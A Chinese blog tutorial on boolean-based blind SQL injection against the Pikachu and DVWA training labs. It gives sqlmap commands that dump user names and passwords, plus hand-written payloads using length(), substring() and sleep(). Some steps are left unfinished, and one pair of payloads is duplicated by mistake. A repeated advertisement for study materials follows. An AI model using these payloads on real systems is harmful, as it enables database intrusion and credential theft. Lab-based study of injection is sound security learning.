SQL注入之路之二:布尔型(boolean)盲注_sqlmap布尔盲注

最新推荐文章于 2024-06-02 00:37:44 发布
最新推荐文章于 2024-06-02 00:37:44 发布
阅读量721 收藏 27
点赞数 8
分类专栏: 程序员 文章标签: sql oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970106/article/details/138778057
版权
文章目录

布尔型(boolean)盲注

页面不会返回数据库的内容,所以不能使用联合查询将敏感信息显示在页面上,但是可以通过构造SQL语句来获取数据。
输入 SQL 注入检测语句 判断页面是否不一样,如果不一样大概会存在 SQL 注 入漏洞 1’and ‘1’='1 一样 1’and ‘1’='2 不一样,如果输入检测语句页面没有任何改 变可以使用延时语句进行检测 1’and sleep(10)–+ 函数 sleep() 在 mysql 是延时 返回的意思 以秒为单位 sleep(10) 即延时 10 秒执行
在这里插入图片描述

用SQLMap爆破

查询是否存在sqlmap已知的漏洞
sqlmap -u"url" -batch

在这里插入图片描述

获取所有的数据库
sqlmap -u"url" --dbs -batch

在这里插入图片描述

获取数据库的表名
sqlmap -u"url" -D pikachu --tables -batch

在这里插入图片描述

获取对应数据库表中的字段名
sqlmap -u"url" -D pikachu -T member --columns -batch

在这里插入图片描述

获取字段的内容
sqlmap -u"url" -D pikachu -T member -C id,username,pw --dump -batch

在这里插入图片描述

手工爆破

布尔型盲注入查询长度

要查询当前库名,首先确定要查询数据库的长度,再通过截取字符进行对比

返回正常界面
vince' and length(database())>=7#

在这里插入图片描述

返回错误界面
vince' and length(database())>=7#

在这里插入图片描述
综上可知数据库长度为7

布尔型盲注入获取数据库名

数据库常用字符如下:
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. @_
将这些字符和数据库中的每一个字符进行比较得到最终的数据库名
获取数据库第一个字符,输入vince' and if(substring(database(),1,1)='p',1,0)
在这里插入图片描述
(后续需要一个个爆破较为麻烦,所以建议用burpsuite来进行爆破)

用bp来判断数据库长度

添加变量
语句:vince' and length(database())>=2#
在这里插入图片描述
开始攻击
在这里插入图片描述

获取数据库名

添加变量

kobe' and (select substr(database(),1,1))='k'#

在这里插入图片描述
爆破数据库
在这里插入图片描述

获取表的长度

输入kobe' and length((select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu' )) = 1 #
在这里插入图片描述
(个人能力有限,手工注入未能实现,但在dvwa靶场能够成功完成,待后续补充)

DVWA靶场实验:

查询数据库长度
1' and if(length(database())=4,1,0)#

在这里插入图片描述

获取数据库名

数据库常用字符如下:
0123456789ABCDEFGHIJKLMNOPQRSTU

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!*

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84970106
关注
  • 8
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入——布尔注入
Night_time的博客
05-04 5084
sqli-labs-master 闯关游戏第八关为例: 第一步:判断注入点 ?id=1' and 1=2-- - //页面显示异常 ?id=1' and 1=1-- - //页面正常显示 第二步:判断是什么类注入点 构建报错语句: ?id=1' and updatexml(1,0x7e,1)-- - 页面无显示,那就不是报错注入: 那就判断是不是布尔注入,首...
SQL注入之二:布尔(boolean)
weixin_62715196的博客
08-10 1126
简单描述什么是布尔以及对与布尔如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔注入的合理性
sql注入-布尔
最新发布
WolvenSec的博客
06-02 1230
布尔Boolean Blind SQL Injection)是一种SQL注入攻击技术,用于在无法直接获得查询结果的情况下推断数据库信息;它通过发送不同的SQL查询来观察应用程序的响应,进而判断查询的真假,并逐步推断出有用的信息。接着我们以DVWA靶场中的为例子进行解释;可以看到该靶场只能显示数据库中是否存在该ID,并不会显示其他数据,那么此时我们就无法直接获得查询结果的情况下推断数据库信息,因此联合查询已经无法满足要求,那么我们就可以使用布尔或其他的注入思想突破。
SQL注入-布尔与时间
LJH1999ZN的博客
02-10 1万+
一、什么是 就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、的分类 基于布尔 基于时间类 三、利用
SQL注入-无回显】布尔:原理、函数、利用过程
06-14 7198
SQL注入-无回显】
sqlmap)【sqli-labs8-10】布尔、时间
07-06 3582
sqlmap-跑靶场】
布尔.py_sqlpython_
10-03
布尔Boolean-Based Blind Injection)是SQL注入攻击的一种类,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,...
Javascript基础教程之数据类布尔 Boolean
10-24
本文简单讲解了javascript数据类中的布尔boolean),十分的简单,小伙伴们看下就明白了
布尔python脚本.zip
12-28
布尔Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
JavaScript类系统之布尔Boolean详解_.docx
10-09
在JavaScript中,布尔Boolean)是基本的数据类之一,用于表示逻辑上的真或假状态。它有两个预定义的值:`true`表示真,`false`表示假。这种类在编程中扮演着至关重要的角色,尤其是在控制程序流程方面。 ...
SQL注入进阶:掌握布尔和延时注入攻击技巧
weixin_43263566的博客
01-21 4225
SQL注入篇 - 布尔及延时注入
布尔怎么用,一看你就明白了。布尔原理+步骤+实战教程
热门推荐
wangyuxiang946的博客
03-16 2万+
写给每一个为了让自己变得更好,而坚持努力的你。
渗透测试基础-布尔和时间
weixin_45488495的博客
04-09 4269
渗透测试基础-布尔和时间实现的关键函数布尔靶场演练时间靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔和时间 也分布尔和时间,这里分别来了解一下各自的区别 布尔:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
SQL注入-布尔
acepanhuan的博客
02-10 1672
学习SQL注入方法之
SQL注入原理及实践(一)–SQL注入布尔注入
dulirongdudu的博客
08-02 2134
当不知道数据库返回值的情况下时【无回显】,输入1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔注入。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
布尔SQL注入
m0_64368365的博客
02-20 1564
布尔适用于无回显的情况,只有通过true或false及页面是否正常来判断所输入内容是否正确。
布尔(结合BurpSuite暴力破解)
weixin_59047731的博客
11-17 727
有些情况下,**开发人员屏蔽了报错信息**,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为根据展现方式,分为**boolean和时间**。 Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点。 Boolean的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。
sql注入———boolean注入布尔
hintll的博客
09-08 966
sql注入———boolean注入布尔) 这里讲关于sql注入中出现一些过滤的情况之基于布尔注入 如果注入网站的源码中有preg_math函数来过滤了一些注入的命令 列如: if(preg_math(“union|sleep|benchmark/i”,$id)){ exit(“no”); } 这里就过滤掉了union等注入命令 如果页面只返回True和False或yes和no两种类页面 这种情况下就要使用布尔注入的方法来进行sql注入 直接先爆破数据库的名称: ?id=1’ and substr(d
webug-布尔注入
我只会装360的博客
09-17 860
布尔注入之一,进行sql语句注入后,选择的数据并不能返回到前端。只能利用其他方法来判断,还是简单介绍下学到的知识点。 left(database(),n)    database() 数据库名称 left()函数表示截取数据库左侧n个字符 substr(a,b,c)      从字符串a的b位置开始截取c个字符,当b为负数时截取位置是从字符串a右端向左数b个字符 mid(a,b,c) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值